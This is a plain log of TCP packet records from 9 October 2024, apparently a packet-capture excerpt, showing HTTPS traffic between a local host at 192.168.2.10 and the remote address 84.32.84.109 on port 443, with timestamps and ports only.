Oct 9, 2024 16:16:00.596457005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.596472025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.596626997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.596687078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.596687078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.596693039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.597310066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.597374916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.597374916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.597383022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.597621918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.598691940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.598814011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.598833084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.598833084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.598839998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.598886967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.598886967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.598898888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.598912954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.599055052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.599061012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.599343061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.599395990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.599395990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.599400997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.600442886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601135969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.601202011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601388931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.601449013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601461887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.601506948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601620913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.601677895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.601762056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601762056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.601768017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.603415966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.648325920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.648405075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.648432016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.648448944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.648941040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.648948908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.650003910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.650011063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.651283026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681453943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681524038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681591988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681602955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681735039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681766033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681770086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681778908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681812048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681812048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681818008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681885958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.681911945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681911945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.681917906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684412956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684437990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684438944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684438944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684448004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684499979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684499979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684504986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684514999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684736013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684747934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684753895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684771061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.684791088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.684793949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.685123920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.685144901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.685144901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.685151100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.685359001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.685405016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.685405016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.685410976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.686193943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.686556101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.686708927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.686742067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.686753035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.686805010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.686805010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.686805964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.687129974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.687431097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.687438965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.687860012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689470053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689621925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689651012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689662933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689783096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689810991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689826012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689826012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689831972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689853907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689865112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.689984083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.689987898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.691435099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.736077070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.736182928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.736341953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.736341953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.736355066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.737979889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.769603968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.769663095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.769675970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.769835949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.769886971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.769886971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.769886971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.769896030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.769993067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.770056963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.770111084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.770118952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.770186901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.770203114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.770207882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.770265102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.770265102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.772608042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.772653103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.772702932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.772728920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.772728920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.772733927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773061037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773241997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773266077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773323059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773323059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773328066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773381948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773492098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773516893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773519993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773533106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773576021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773576021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.773581982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.773926020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.774432898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.774580956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.774590015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.774625063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.774662971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.774662971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.774667978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.774722099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.774722099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.775851011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.775911093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.775940895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.776551962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.778851986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.778920889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.778934956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779011965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.779016018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779028893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779074907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.779087067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779092073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779138088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.779143095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779181004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779226065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.779231071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.779347897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.824409008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824553967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824646950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824665070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.824665070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.824680090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824692011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.824748039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824791908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.824796915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.824830055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.857978106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858036995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858069897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858094931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.858097076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858113050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858206034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858234882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858253956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.858253956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.858258963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858262062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.858272076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.858273983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.858299017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860203028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860240936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860254049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860266924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860295057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860306978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860344887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860349894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860384941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860466957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860498905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860516071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860521078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860543013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860558033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860595942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860639095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860903025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860943079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860946894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.860954046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.860981941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.862199068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862236023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862266064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.862274885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862284899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.862361908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862401009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.862405062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862430096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862442970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.862448931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.862471104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.863094091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.863136053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.863142014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.863187075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.863193035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.863243103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866344929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866386890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866419077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866429090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866441011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866445065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866496086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866499901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866542101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866843939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866894007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866894007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866903067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866938114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866939068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.866946936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.866981983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.889776945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.911638975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911684036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911705971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911720037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.911729097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911751032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911768913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.911772966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.911792994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.911809921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960669041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960702896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960741043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960746050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960756063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960788965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960792065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960799932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960829020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960829973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960836887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960867882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960876942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960918903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960922956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960951090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960958958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.960963011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.960984945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961141109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961174965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961180925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961184978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961216927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961227894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961231947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961261034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961268902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961349010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961383104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961386919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961390972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961422920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961581945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961621046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961628914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961632967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961652994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961680889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961685896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961697102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961699963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961723089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961738110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961774111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961813927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961910963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961946011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961951971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961956024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.961982012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.961987019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.962014914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.962028980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.962033033 CEST	443	49723	84.32.84.109	192.168.2.10
